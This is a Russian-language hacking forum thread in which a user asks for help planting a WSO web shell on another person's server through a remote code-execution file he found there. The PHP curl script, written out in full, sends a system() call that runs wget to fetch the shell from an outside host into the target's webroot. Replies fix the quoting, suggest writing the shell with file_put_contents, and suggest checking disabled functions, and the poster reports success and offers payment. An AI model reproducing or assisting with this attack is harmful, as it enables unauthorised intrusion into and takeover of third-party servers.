Добрый день , нашёл один сайт на котором лежит файл с таким содержимым:

.SpoilerTarget" type="button">Spoiler: Code1

Я создал на своём сервере файл .php и загрузил в него форму curl с отправкой файла:

.SpoilerTarget" type="button">Spoiler: Code2
ass');

$codec = system("wget -b -P /var/www/ku/data/www/ip_serva_s_failom_code1/app/webroot/ https://ovrload.ru/f/*****.php");

$postdata ="fack=". urlencode(base64_encode($codec));

$headers["Content-Length"]= strlen($postdata);

$headers["User-Agent"]="Curl/1.0";

$headers["Content-Length"]= strlen($postdata);

$headers["User-Agent"]="Curl/1.0";

curl_setopt($ch, CURLOPT_HTTPHEADER, $headers);

curl_setopt($ch, CURLOPT_POSTFIELDS, $postdata);

$res = curl_exec($ch);

curl_close($ch);?>

Пытаюсь отправить пост запрос с загрузкой файла через curl но файл создаётся на моем сервере а не на том ip куда я посылаю запрос.

Авторизацию проходит , поэтому половина кода работает 100%, а POSRFIELDS вместо того что бы выполнятся на его сервере выполняется на моем , поправляете пожалуйста где сделал ошибку , если всё получится с меня 5$ на wmz

Главная задача залить wso через файлик code1

Я так думаю надо в $codec = system("wget -b -P /var/www/ku/data/www/ip_serva_s_failom_code1/app/webroot/ https://ovrload.ru/f/*****.php");

после = и до ; взять в кавычки ну и разобраться с экранированием кавычек внутри...

artkar said:
↑ (https://antichat.live/posts/4132780/)
Я так думаю надо в $codec = system("wget -b -P /var/www/ku/data/www/ip_serva_s_failom_code1/app/webroot/
https://ovrload.ru/f/*****.php
");
после = и до ; взять в кавычки ну и разобраться с экранированием кавычек внутри...


Поставил кавычки получаю ошибку 500

а почему у тебя пост? Нужно ведь гет?

И попробуй скопировать в папку /logs

tagnohilori said:
↑ (https://antichat.live/posts/4132756/)
Пытаюсь отправить пост запрос с загрузкой файла через curl но файл создаётся на моем сервере а не на том ip куда я посылаю запрос.
Авторизацию проходит , поэтому половина кода работает 100%, а POSRFIELDS вместо того что бы выполнятся на его сервере выполняется на моем , поправляете пожалуйста где сделал ошибку , если всё получится с меня 5$ на wmz
Главная задача залить wso через файлик code1


Во-первых url должен быть '


Code:
http://ip_serva_s_failom_code1/get_post.php?key=sdfadsgh4513sdGG435341FDGWWDFGDFH DFGDSFGDFSGDFG'

;

Во-вторых, строка запроса должна быть в таком виде:


Code:
$codec = 'system("wget -b -P /var/www/ku/data/www/ip_serva_s_failom_code1/app/webroot/ https://ovrload.ru/f/*****.php");'

, то есть как правильно уже сказал в кавычках. Если system не работает (возможно она отключена), то можно попробовать напрямую записать вебшелл через, например, file_put_contents. И да, нужно проверить есть ли права на запись в нужной папке, так же через php все это можно сделать.

blackbox said:
↑ (https://antichat.live/posts/4132852/)
Во-первых url должен быть '

Code:
http://ip_serva_s_failom_code1/get_post.php?key=sdfadsgh4513sdGG435341FDGWWDFGDFH DFGDSFGDFSGDFG'

;
Во-вторых, строка запроса должна быть в таком виде:

Code:
$codec = 'system("wget -b -P /var/www/ku/data/www/ip_serva_s_failom_code1/app/webroot/ https://ovrload.ru/f/*****.php");'

, то есть как правильно уже сказал в кавычках. Если system не работает (возможно она отключена), то можно попробовать напрямую записать вебшелл через, например, file_put_contents. И да, нужно проверить есть ли права на запись в нужной папке, так же через php все это можно сделать.


Ничего не помогло , просто ничего не происходит , тестирую на 2х своих серверах , шелл который по идее должен скачается на сервер не скачивается

tagnohilori said:
↑ (https://antichat.live/posts/4132868/)
Ничего не помогло , просто ничего не происходит , тестирую на 2х своих серверах , шелл который по идее должен скачается на сервер не скачивается


Нужно посмотреть, не отключена ли функция system:


Code:
$codec = 'есho ini_get("disable_functions");'

И в коде отсылки запроса добавить вывод:


Code:
$res = curl_exec($ch);
echo $res;

blackbox said:
↑ (https://antichat.live/posts/4132871/)
Нужно посмотреть, не отключена ли функция system:

Code:
$codec = 'есho ini_get("disable_functions");'

И в коде отсылки запроса добавить вывод:

Code:
$res = curl_exec($ch);
echo $res;



Просто пустой экран , у тебя есть телеграмм ? Или скайп

Ps. Все получилось , в конце $codec надо было поставить ....php");'; как-то так , и обращаться к key,

Твой ответ мне помог напиши свой wmz в лс

tagnohilori said:
↑ (https://antichat.live/posts/4132874/)
Просто пустой экран , у тебя есть телеграмм ? Или скайп
Ps. Все получилось , в конце $codec надо было поставить ....php");'; как-то так , и обращаться к key,
Твой ответ мне помог напиши свой wmz в лс


Рад что помог, wmz оставь себе на мороженое.

blackbox said:
↑ (https://antichat.live/posts/4132881/)
Рад что помог, wmz оставь себе на мороженное.


Спасибо , доброго вам вечера )